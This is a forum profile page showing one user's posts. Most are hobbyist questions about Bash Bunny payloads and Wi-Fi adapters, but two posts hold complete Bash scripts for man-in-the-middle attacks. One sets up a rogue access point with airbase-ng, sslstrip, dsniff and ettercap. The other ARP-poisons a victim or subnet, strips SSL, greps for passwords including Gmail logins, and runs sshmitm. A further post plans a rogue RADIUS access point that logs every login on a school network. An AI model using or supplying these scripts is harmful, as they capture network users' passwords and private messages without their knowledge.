Junke1990

Active Members
  • Posts: 25
About Junke1990

  • Birthday 09/27/1990

Profile Information

  • Gender
    Male
  • Location
    Maastricht, Netherlands


  1. VB used to stand for VisualBasic, possibly years ago
  2. You just made me feel old...xD
  3. ow! I thought you were bullshitting me "i need to mount a VB to check? " mounting visual Basic? :P Thanks for the effort!
  4. that doesn't answer my question, is it possible to detect it, yes or no, and if so, how?
  5. My question is, is it possible to detect if a Windows (XP SP3+) Machine is locked. Regardless of the payload, I want to be able to automate more thus detect in code if it is locked. I could make 2 payloads, locked and unlocked but I would like to combine that into 1.
  6. Windows, at least at first, do have Linux but no OSX in house
  7. Is there an easy way to detect whether the screen is locked or not?
  8. Thanks! Any tips/pointers I should look into while waiting on the post?
  9. Where should the extensions go? There isn't anything about it in https://bunnytoolkit.com/guides/. The Git docs (https://github.com/hak5/bashbunny-payloads/tree/master/docs) say payload/library/extensions; on the other hand, the https://wiki.bashbunny.com/#!index.md guide says payload/extensions. P.s. mine has been shipped about an hour ago so I can't test it out myself.
  10. If you have any suggestions please let me know!

#!/bin/bash
# SoftAP for wireless-testing
# Created/Modded by Junke1990
#
# Hardware: Eee PC 1000h
# NICs
# eth0 (LAN)
# ra0 (WLAN) rt2860STA
# wlan1 (USB WLAN) RTL8170L
# dealextreme sku.27963

# init
sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py'

# services
dsn=0     # Dsniff
ims=0     # IMsniff
msg=0     # MSGsnarf
url=0     # URLsnarf
ssllog1=0 # tail sslstrip.log
ssllog2=0 # tail sslstrip.log |grep pass

# Make sure only root can run our script
if [[ $EUID -ne 0 ]]; then
  echo "This script must be run as root" 1>&2
  exit 1
fi

modprobe tun
sleep 1

echo "[>] Starting: Soft AP - Junke1990"

# get interface and mac list
i=0
iflist=()
maclist=()
while read -r if mac; do
  iflist[i]=$if
  maclist[i]=$mac
  ((i++))
done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')

for i in "${!iflist[@]}"; do
  echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
done

echo -n "[?] Select your inet conn. [#] "
read j
intI=${iflist[j]}

# select SoftAP adapter
for i in "${!iflist[@]}"; do
  if [ $j != $i ]; then
    echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
  fi
done

echo -n "[?] Select your SoftAP adapter. [#] "
read j
intAP=${iflist[j]}
# MAC address
intAP_MAC=${maclist[j]}

echo "[+] Gathering network info..."
# info inet conn
intI_IP=`ifconfig $intI | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
intI_DNS=`cat /etc/resolv.conf | sed -n "2 p" | awk '{ print $2}'`
intI_gw=`route -n | awk '{ print $2}' | grep -v '0.0.0.0' | sed -n "3 p"`
intI_mask=`ifconfig $intI | grep 'Mask:' | grep -v '0.0.0.0' | awk '{ print $4}' | cut -d: -f2`
intI_netw=`route -n | grep $intI_mask | cut -d' ' -f1 | head -n 1`

# converting netmask in to netmask length
echo "[+] Calc'ing network mask..."
NETMASK=$intI_mask
MASK1=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\1/'`
MASK2=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\2/'`
MASK3=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\3/'`
MASK4=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
BM1=`echo -e "obase=2; ${MASK1}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM2=`echo -e "obase=2; ${MASK2}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM3=`echo -e "obase=2; ${MASK3}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM4=`echo -e "obase=2; ${MASK4}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
MASK=$(( BM1 + BM2 + BM3 + BM4))
intI_mask_nb=$MASK

# enter wireless essid name
echo -n "[?] Enter the desired name for wireless network: "; read ssid

# prepare interface / softap
#wlanconfig $intAP destroy
#wlanconfig $intAP create wlanmode mon wlandev wifi0
if [ `echo $intAP || grep 'mon' ` ]; then
  intAP=`airmon-ng start $intAP |grep "monitor mode " | awk '{ print $5 }' |sed 's/)//'`;
fi

echo "[+] Setting up fake AP..."; sleep 1;
# to enable wep add: -W 1 -w "1234567890" -a $intAP_MAC
xterm -geometry 75x15 -e airbase-ng -c 6 -e "$ssid" $intAP &
sleep 1;
ifconfig at0 up
ifconfig at0 192.168.3.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net $intI_netw netmask $intI_mask gw $intI_gw
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1

# monitor
#xterm -e airodump-ng -c 6 --bssid $intAP_MAC $intAP &
#xterm -e tshark -i 3 "not broadcast and not multicast" & # at0 = 3

echo "[+] Killing dhcpd..."
# do this quiet for when the process isn't running
killall -q dhcpd3

echo "[+] Setting up DHCP config..."
# create custom dhcpd.conf for WLAN
DHCPDCONF='';
cat > dhcpd.conf << EOF
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.3.0 netmask 255.255.255.0 {
  option subnet-mask 255.255.255.0;
  option broadcast-address 192.168.3.255;
  option routers 192.168.3.1;
EOF
### Submitted by ToomSec
for d in $(cat /etc/resolv.conf | sed -r 's/^.* ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*$/\1/' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
do
  echo "option domain-name-servers $d;" >> dhcpd.conf
done
cat >> dhcpd.conf << EOF
  range 192.168.3.10 192.168.3.254;
}
EOF

echo "[+] Cleaning up IP tables..."
# iptables cleanup
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Setting up forwarding tables..."
# iptables
#iptables -t nat -A PREROUTING -p udp -j DNAT --to $intI_gw # all udp traffic
#iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $intI_DNS # DNS only
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 # send stuff to sslstrip
iptables -A FORWARD --in-interface at0 -j ACCEPT # rogue gateway
iptables -t nat -A POSTROUTING --out-interface $intI -j MASQUERADE # gateway to ext. router
#iptables -t nat -A PREROUTING -s 192.168.3.0/24 -d $intI_netw/$intI_mask_nb -j DROP # protect LAN from WLAN

# ip fwd enable
echo 1 > /proc/sys/net/ipv4/ip_forward

# start dhcp server for subnet
# edit /etc/apparmor.d/usr.sbin.dhcp3 to allow dhcpd to read the config file if it keeps giving permission denied
echo "[+] Setting up DHCP server..."
xterm -geometry 75x10 -T DHCP -e dhcpd3 -d -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &

### python-twisted-web2 required!!!
if [ -f $sslstrip ]; then
  echo "[+] Setting up sslstrip..."
  xterm -geometry 45x5 -e python $sslstrip -a -k -f -l 8080 &
  if [ $ssllog1 == 1 ]; then
    xterm -e tail -f sslstrip.log &
  fi
  if [ $ssllog2 == 1 ]; then
    xterm -e "tail -f sslstrip.log |grep 'pass' "&
  fi
  sleep 1
else
  echo "[-] SSLStrip not found..."
  echo 'Edit $sslstrip to the correct path.'
fi

# DSniff
if [ $dsn == 1 ]; then
  if which dsniff >/dev/null; then
    echo "[+] Setting up dsniff..."
    xterm -e dsniff -i at0 -m &
    sleep 1
  fi
fi

# IMSniff - MSN only
if [ $ims == 1 ]; then
  if which imsniff >/dev/null; then
    echo "[+] Setting up IMSniff..."
    if [ ! -d 'IMlog' ]; then
      mkdir IMlog
    fi
    # gives a lot of unknown content err's
    xterm -e "imsniff -cd IMlog at0 |grep -i -v 'unknown'"&
    sleep 1
  fi
fi

# MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
if [ $msg == 1 ]; then
  if which msgsnarf >/dev/null; then
    echo "[+] Setting up MSGsnarf..."
    xterm -e msgsnarf -i at0 &
    sleep 1
  fi
fi

# URLSnarf
if [ $url == 1 ]; then
  if which urlsnarf >/dev/null; then
    echo "[+] Setting up URLsnarf..."
    xterm -e urlsnarf -i at0 &
    sleep 1
  fi
fi

# ettercap TCP Ports
# IMAP - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
# POP3 - 110/TCP 995/TCP
# SMTP - 25/TCP 465/TCP
# SSL - 443/TCP
# HTTP - 80/TCP
# SSH - 22/TCP
# MSN - 1863/TCP
# Yahoo - 5050/TCP - nobody interesting uses yahoo...
# ICQ - 5190/TCP - nobody at all uses ICQ xD
echo "[+] Setting up ettercap..."
#xterm -e ettercap -T -i at0 -P autoadd -l ettercap -w ettercap.pcap -M arp /192.168.3.1/ /192.168.3.10-254/22,25,80,110,143,220,443,465,993,995,1863 &
### Submitted by ToomSec
#ettercap -T -q -p -u -z -m ${LOGFOLDER}ettercap_evilap.log -i $wint >> $LOGFILE 2>&1
xterm -e ettercap -T -q -p -u -z -m ettercap_evilap.log -i at0 &
sleep 1

# ip_forward
# as last to avoid reset
echo "[+] Enabling IP forward..."
echo "1" > /proc/sys/net/ipv4/ip_forward
chk=`cat /proc/sys/net/ipv4/ip_forward`
if [ $chk != "1" ]; then
  echo "[-] Can NOT enable ip_forward..."
fi

echo "[x] All done! have fun!"
  11. I honestly don't know, I'm not that big of an expert when it comes to ettercap. I did update the script to make it easier, but it is still a work in progress. I have a Soft AP script too; if you want, I can put it up here too. It is based on this one but has a few other features, since you are actually in the middle of the traffic.
  12. Hey guys, since I was getting tired of doing everything by hand I made a little script to automate the procedure xD Let me know if something is done wrong or you have suggestions!

#!/bin/bash
# ARP Poisoning
# Created by Junke1990
# Tested with Asus eee 1000h
#
### required packages ###
# sudo apt-get -y install ettercap python-twisted-web2 dsniff imsniff python
# sslstrip - google, download, extract and alter path below!

# init
sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py'
logfolder='ARP-logs/'

# Make sure only root can run our script
if [[ $EUID -ne 0 ]]; then
  echo "This script must be run as root" 1>&2
  exit 1
fi

modprobe tun
sleep 1

# get interface and mac list
i=0
iflist=()
maclist=()
while read -r if mac; do
  iflist[i]=$if
  maclist[i]=$mac
  ((i++))
done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')

for i in "${!iflist[@]}"; do
  echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
done

echo -n "Select your interface to ARP poison. [#] "
read j
int=${iflist[j]}

echo -n "IP address of victim: [x.x.x.x]/[a]"
read vic

# info inet conn
int_IP=`ifconfig $int | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
int_gw=`route -n | awk '{ print $2}' |grep -v '0.0.0.0' | sed -n "3 p"`
int_bc=`ifconfig $int | grep 'Bcast:'|cut -d: -f3 | awk '{ print $1}'`

# lowest IP
oct4=`echo ${int_gw} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
oct4=$((oct4+1))
int_a=`echo $int_gw | cut -d. -f1,2,3`
int_a="$int_a.$oct4"

# highest IP
oct4=`echo $int_bc | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
int_b=$((oct4-1))

# range
int_range="$int_a-$int_b"

# determine victim
if [ $vic = "a" ]; then
  vic=$int_range;
fi

# iptables
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# ettercap TCP Ports
# IMAP - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
# POP3 - 110/TCP 995/TCP
# SMTP - 25/TCP 465/TCP
# SSL - 443/TCP
# HTTP - 80/TCP
# SSH - 22/TCP
# MSN - 1863/TCP
# Yahoo - 5050/TCP - nobody interesting uses yahoo...
# ICQ - 5190/TCP - nobody at all uses ICQ xD
xterm -e ettercap -T -P autoadd -i $int -L ettercap.log -m ettercap.msg.log -l ettercap.info.log -w ettercap.pcap -M arp /$int_gw/ /$vic/22,25,80,110,143,220,443,465,993,995 &

### python-twisted-web2 required!!!
if [ -f $sslstrip ]; then
  xterm -title sslstrip -e python $sslstrip -s -f -k -l 8080 &
  sleep 1
  xterm -e tail -f "sslstrip.log" &
  sleep 1
  xterm -e "tail -f sslstrip.log |grep -i 'pass' "&
  # filters - not fully tested!
  # xterm -title HYVES -e "tail -f sslstrip.log |grep 'auth_username' | sed 's/.*auth_username=/user=/' | sed 's/\&/ /g' | awk '{print $1 $2}'"&
  # xterm -title GMAIL -e "tail -f sslstrip.log |grep Passwd | sed 's/.*Email=/Email=/' | sed 's/\&/ /g' | awk '{print $1 $2 }'"&
else
  echo "sslstrip not found."
  echo 'Edit $sslstrip to the correct path.'
fi

# DSniff
if which dsniff >/dev/null; then
  xterm -e dsniff -i $int -m -w dsniff.log &
fi

# IMSniff - MSN only
if which imsniff >/dev/null; then
  if [ ! -d 'IMlog' ]; then
    mkdir IMlog
  fi
  # gives a lot of unknown content err's
  xterm -e "imsniff -cd IMlog $int |grep -i -v 'unknown'"&
fi

# MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
if which msgsnarf >/dev/null; then
  xterm -e msgsnarf -i $int &
fi

### SINGLE VICTIM ONLY ###
# SSH mitm
if which sshmitm >/dev/null; then
  if [ $vic != "a" ]; then
    xterm -e sshmitm -I $vic &
  fi
fi

# ip_forward
# as last to avoid reset
echo "1" > /proc/sys/net/ipv4/ip_forward
chk=`cat /proc/sys/net/ipv4/ip_forward`
if [ $chk != "1" ]; then
  echo "Can't enable ip_forward"
fi

edit: updated the script
  13. From where are you trying to connect to your WAN IP? I know that when I connect to my WAN IP from inside the network, the traffic isn't forwarded but the router thinks it's for itself.
  14. Hey guys, I wanted to see if I could MiTM at my school, but again and again it was unsuccessful. By simply asking the guys of the IT department I now know they use a radius server with AD, but worse, DHCP snooping. So therefore I cannot use the ARP poisoning or DHCP exhaustion. Best part, I've got permission to screw around with the network as much as I want since """I was such a great student thinking along with them to "solve" the security issues""". So I was thinking about setting up a Soft AP with NAT and my own Radius Server which accepts every login and logs those, and with a second interface to connect to the actual network and passing the information, stripped, through. I've ordered a nice wireless card online to make sure my signal is better, http://www.dealextreme.com/details.dx/sku.27963 Any ideas or thoughts?
  15. If an external adapter is an option: I'm the owner of an EEE 1000h, not suited for VMs, but besides that, I was looking for an external WLAN adapter with a lot of power and it must be cheap. Check this one out: http://www.dealextreme.com/details.dx/sku.27963 It's based on a RTL8187L chipset. I don't have it, it's still on its way, but the reviews of other people are well promising. Here's a nice review of the product: http://www.dealextreme.com/forums/Default....threadid.537069